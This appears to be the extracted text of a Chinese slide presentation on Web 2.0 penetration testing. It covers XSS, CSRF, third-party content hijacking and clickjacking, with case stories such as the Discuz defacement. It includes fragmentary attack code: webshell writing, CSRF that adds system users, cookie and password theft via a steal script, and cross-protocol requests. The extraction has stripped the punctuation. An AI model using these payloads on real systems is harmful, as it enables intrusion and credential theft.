WEB2.0下的滲透測(cè)試

WEB2 0下的滲透測(cè)試 WEB1 0下的滲透測(cè)試 通過(guò)web服務(wù)器漏洞直接溢出得到cmdshelliis60day bin t p80通過(guò)web應(yīng)用程序傳統(tǒng)漏洞得到webshell傳統(tǒng)漏洞是指作用于web服務(wù)端語(yǔ)言的漏洞如上傳 sql注射 包含等 phpwind0day php t p80主要特點(diǎn)屬于服務(wù)端攻擊 攻擊效果 直截了當(dāng) 還是目前主流的滲透測(cè)試方式 但是尋找漏洞成本越來(lái)越高 安全產(chǎn)品的應(yīng)用使利用越來(lái)越困難 關(guān)于WEB2 0 Web2 0一種相對(duì)概念 提倡的是高親和力的交互應(yīng)用 主體是用戶之間用戶與網(wǎng)站之間的互動(dòng) Web2 0的核心注重的不僅是技術(shù) 而更注重的設(shè)計(jì)思想 AJAX技術(shù)的誕生標(biāo)著web進(jìn)入2 0時(shí)代 也是其核心技術(shù)web2 0更注重互動(dòng)的設(shè)計(jì)思想如博客 wiki sns網(wǎng)絡(luò)等誕生Web2 0下的滲透繼承了web2 0的特點(diǎn) 思想更重要 WEB2 0下的滲透測(cè)試 攻擊的目標(biāo)主要的攻擊方式 XSS CSRF 第三方內(nèi)容劫持 Clickjacking等 攻擊方式的趨勢(shì)走向攻擊成功后的效果現(xiàn)有的認(rèn)識(shí)幾個(gè)滲透小故事 攻擊的目標(biāo) 與WEB1 0相比 WEB2 0滲透是針對(duì)客戶端的攻擊 包括網(wǎng)站用戶 網(wǎng)站的管理員 網(wǎng)站的運(yùn)維 安全人員 還包括和你一樣的 滲透者 主要的攻擊方式 XSS XSS在web1 0誕生 在web2 0時(shí)代出名 1996年就有人提到了這類(lèi)攻擊 JeremiahGrossman說(shuō)的 1999年DavidRoss和GeorgiGuninski提出 Scriptinjection 2000年apache官方一篇文檔里正式取名 CrossSiteScripting 2005年samyworm誕生 標(biāo)志著XSS進(jìn)入web2 0時(shí)代 xss火了 2007年出版的 XSSAttacksBook 提出 XSSistheNewBufferOverflow JavaScriptMalwareisthenewshellcode XSS的利用 web1 0時(shí)代 彈筐 alert 收集cookie document cookie web2 0時(shí)代 xssworm這也是目前xss的主流利用 我們思想還處于90年代 這也是廣大腳本小子被bs的原因之一 XSS 彈筐 收集cookie wormxss本質(zhì)是在于執(zhí)行腳本 javascript html等 而一個(gè)javascript就足夠讓你黑遍這個(gè)世界 主要的攻擊方式 CSRF CSRF CrossSiteRequestForgery誕生于2000年 火于2007 2008年 得益于XSS的光芒 及幾大web2 0的應(yīng)用如gmail的CSRF漏洞 直譯為 跨站請(qǐng)求偽造 跨 是它的核心 跨httpsite 攻防技術(shù)已經(jīng)趨于成熟如 BypassPreventingCSRF 2008年對(duì)于csrf的防御 CSRFworm我在2008 01年blog提到過(guò)這個(gè)概念 2008 0980sec實(shí)現(xiàn) 百度HiCsrf蠕蟲(chóng)攻擊 跨協(xié)議通信 Inter ProtocolCommunication byWadeAlcorn2006年 讓通過(guò)客戶端攻擊用戶本地電腦其他服務(wù)變?yōu)榭赡?如下代碼在webkit下實(shí)現(xiàn)了http與irc的通信 gibson document createElement form gibson setAttribute name B gibson setAttribute target A gibson setAttribute method post gibson setAttribute action gibson setAttribute enctype multipart from data crashoverride document createElement textarea crashoverride setAttribute name C postdata USERABCD nNickxxxx n crashoverride setAttribute value postdata crashoverride innerText postdata crashoverride innerHTML postdata gibson appendChild crashoverride document body appendChild gibson gibson submit 主要的攻擊方式 CSRF 從其他應(yīng)用程序發(fā)起的跨站請(qǐng)求如wordwinrar等文件 主要的攻擊方式 第三方內(nèi)容劫持 TheDangersofThirdPartyContent bySanJoseOWASP WASCAppSec20072009年開(kāi)始天朝紅火了一把 Dz事件 在后面講具體提到 廣告業(yè)務(wù) 網(wǎng)頁(yè)游戲 統(tǒng)計(jì)服務(wù)導(dǎo)致第三方內(nèi)容應(yīng)用廣泛 web應(yīng)用程序里的第三方內(nèi)容 比如bbs官方升級(jí)提示功能等其他應(yīng)用程序里的第三方內(nèi)容 如瀏覽器插件里的引入的jshtml等 包括JavaScript HTML Flash CSS etc 主要的攻擊方式 第三方內(nèi)容劫持 又一個(gè)個(gè) 引狼入室 的悲劇故事 劫持第三方內(nèi)容的方法 域名劫持如百度事件 直接攻擊域名注冊(cè)商 會(huì)話劫持 如arp會(huì)話劫持 zxarps exe 交換機(jī)會(huì)話劫持 SSClone 直接攻取第三方內(nèi)容服務(wù)器權(quán)限 恩 很黃很暴力 目前基本沒(méi)有安全防御意識(shí) 你的安全被別人做了主了 主要的攻擊方式 Clickjacking Clickjacking 點(diǎn)擊劫持 byJeremiahGrossmanandRobertHansenin2008 立刻紅火 WEB2 0安全進(jìn)入 美工黑客 時(shí)代 安全防御者的惡夢(mèng) 一個(gè)新的httpheader誕生 X Frame Options衍生出的其他UI劫持如 Tapjacking 觸摸劫持 攻擊方式的趨勢(shì)走向 攻擊方式越來(lái)越 猥瑣 沒(méi)有最 猥瑣 只有更 猥瑣 新的攻擊方式從誕生到紅火時(shí)間越來(lái)越短 攻擊成功后的效果 從上面的攻擊方式來(lái)看 它們有一個(gè)共同的目標(biāo) 劫持你的瀏覽器 哪里有瀏覽器哪里就有攻擊 劫持你的瀏覽器 的效果就是你的 身份被劫持 所以攻擊目標(biāo)的 身份 決定了 滲透思想 攻擊成功后的效果 劫取你的隱私 網(wǎng)站的普通用戶如常見(jiàn)的取得你ID 密碼 cookie 聯(lián)系等劫取你的權(quán)限 網(wǎng)站管理人員如網(wǎng)站的后臺(tái) 進(jìn)一步通過(guò)后臺(tái)得到網(wǎng)站的權(quán)限等劫取你的系統(tǒng) 所有用戶如利用瀏覽器的漏洞 或者通過(guò)跨協(xié)議利用你系統(tǒng)上其他服務(wù)的漏洞得到你的系統(tǒng)權(quán)限 或者取得本地系統(tǒng)上文件的讀寫(xiě)能力等劫取你的 內(nèi)網(wǎng) 公司成員 這個(gè)又因在內(nèi)網(wǎng)的身份不同而不同 如分開(kāi)發(fā)測(cè)試員 運(yùn)維人員 內(nèi)部網(wǎng)絡(luò)管理人員 安全測(cè)試人員等等 如通過(guò)攻擊程序員的開(kāi)發(fā)環(huán)境 直接取得內(nèi)網(wǎng)系統(tǒng)的權(quán)限 目前對(duì)于WEB2 0滲透測(cè)試的認(rèn)識(shí) Web2 0滲透 xss 彈筐 收集cookie wormWeb2 0滲透 Mailxss office等軟件0day釣魚(yú)Web2 0滲透 Xssshell Beef Anehta這些xss攻擊平臺(tái)工具 看了下面的幾個(gè)故事 或許有所改變 幾個(gè)滲透小故事 黑遍全世界 談?wù)?Dz事件 螳螂捕蟬 談?wù)?滲透者自身的安全 本地web開(kāi)發(fā)測(cè)試環(huán)境的安全隱患 來(lái)自 漏洞庫(kù) 的漏洞 是誰(shuí)想動(dòng)了我的奶酪 黑遍全世界 之 Dz事件 名詞解釋 Dz事件 是指2009年1月8日一大批的Discuz 論壇的首頁(yè)被篡改為 Hackedbyring04h justforfun 的事件 官方通告 本次安全問(wèn)題系由域名劫持造成 Discuz 各版本軟件代碼在安全上并無(wú)問(wèn)題 事件的根本原因是 第三方內(nèi)容劫持 這里 第三方內(nèi)容 具體是指 后臺(tái)升級(jí)提示系統(tǒng) 引入位于上的javascript代碼Discuz 5 5 0 SC GBK upload admin global func php echo 從官方通告來(lái)看ring04h正是通過(guò)攻擊這個(gè)域名來(lái)達(dá)到劫持這個(gè)js的目的 被劫持后的代碼片段 獲取FORMHASHxmlhttp open GET siteurl admincp php action home來(lái)達(dá)到篡改主頁(yè)的目的 本次事件是 善意 的 惡意 的攻擊還在后頭 結(jié)合其他后臺(tái)得到webshell的漏洞 可以直接控制整個(gè)被攻擊的論壇主機(jī) 如 通過(guò)SODB 2008 10寫(xiě)入webshell xmlhttp open POST siteurl admincp php action runwizard直接把寫(xiě)入了forumdata logs runwizardlog php文件里 在后續(xù)的 惡意 的攻擊 跨應(yīng)用程序的 第三方內(nèi)容劫持 攻擊 讓你 黑遍全世界 目前discuz就升級(jí)提示功能已經(jīng)放棄了使用引入第三方j(luò)s了 但是還有其他功能里有應(yīng)用 目前大多數(shù)應(yīng)用程序使用引入第三方j(luò)s 如phpwind 螳螂捕蟬 黃雀在后 攻擊者 螳螂 把捕獲的 蟬 的密碼通過(guò)img發(fā)送給steal php收集保存某個(gè)文件里或者數(shù)據(jù)庫(kù)里 然后后臺(tái)顯示管理 這個(gè)后臺(tái)管理就是攻擊者 黃雀 的目標(biāo)了 嘗試提交url com steal php data 3Cscript 20src 3Dhttp 3A 2F 2F http 的代碼 因?yàn)椴皇?惡意 攻擊 只是簡(jiǎn)單的收集了一下ip及referer 后臺(tái)url 本地web開(kāi)發(fā)測(cè)試環(huán)境的安全隱患 故事發(fā)生在2008年的一天 從一個(gè)圖片開(kāi)始 Phpspy缺少csrf的防御 我們可以嘗試下直接利用phpspy本身的 執(zhí)行命令 功能來(lái)攻擊開(kāi)發(fā)者 angel 的本地開(kāi)發(fā)環(huán)境 聯(lián)系angel得到phpspy2008的代碼 得到了 執(zhí)行命令 功能的提交方式 當(dāng)時(shí)構(gòu)造代碼如下 varurl userheigeheige add echofuck c heige txt getURL url functiongetURL s varimage newImage image style width 0 image style height 0 image src s 找了個(gè)借口讓angel訪問(wèn)了放置如上代碼的url 結(jié)果 因?yàn)闆](méi)有考慮ie的 隱私策略 導(dǎo)致cookie被攔截而失敗 但是這個(gè)思路是完全可行的 其他的一些思路 A Dz事件 的延續(xù) 調(diào)用通過(guò)后臺(tái)得到的webshell forumdata logs runwizardlog php執(zhí)行系統(tǒng)命令 本地web服務(wù)器是apache的 一般都是用高權(quán)限運(yùn)行 xmlhttp open POST siteurl forumdata logs runwizardlog php false xmlhttp setRequestHeader Referer siteurl xmlhttp setRequestHeader Content Type application x 執(zhí)行命令為netuser80vul80vul add在實(shí)際hack中可以換為或者echoiget vbs等方法下載并且執(zhí)行你的程序xmlhttp send cmd 6E 65 74 20 75 73 65 7 B 利用開(kāi)發(fā)編輯器的漏洞 如 C 利用系統(tǒng)其他服務(wù)的漏洞比如某ftp軟件的溢出漏洞等 使用 跨協(xié)議通信 或者相關(guān)的協(xié)議攻擊本地 如 SunSolaris10ftpd存在一個(gè)繞過(guò)驗(yàn)證執(zhí)行系統(tǒng)命令的漏洞 他可以通過(guò)直接在網(wǎng)頁(yè)里調(diào)用實(shí)現(xiàn)對(duì)本地的攻擊 一個(gè)挑戰(zhàn) HackGameNo 1 來(lái)自 漏洞庫(kù) 的漏洞 該故事發(fā)生在今年的5月由80vul發(fā)起的 SOBB 項(xiàng)目 在部分的漏洞公告里 我們預(yù)留了一個(gè)攻擊接口 目的是為了探測(cè)各大網(wǎng)絡(luò)媒體轉(zhuǎn)貼觸發(fā)的xss漏洞 不過(guò)一不小心直接跨進(jìn)了某著名網(wǎng)絡(luò)安全公司的內(nèi)網(wǎng)的 漏洞庫(kù) 后續(xù)的攻擊 是誰(shuí)想動(dòng)了我的奶酪 80vul建立以來(lái) 有沒(méi)有人想黑我們呢 于是我們布置了一個(gè)簡(jiǎn)單的 網(wǎng) Content Type text htmlServer Microsoft IIS 7 0X Powered By PHP 5 2 12 Date Sun 28Nov201011 21 26GMTContent Length 5993 是誰(shuí)想動(dòng)了我的奶酪 用標(biāo)簽加載img php后 用onload事件加載javascript文件anti php這樣設(shè)計(jì)的目的 只有img php和anti php兩個(gè)文件都加載時(shí) 才說(shuō)明有 魚(yú) 進(jìn)網(wǎng) 防止別人單一提交的嘗試 新時(shí)代的防御 加強(qiáng)培訓(xùn) 一個(gè)永恒的主題 SDL的前提和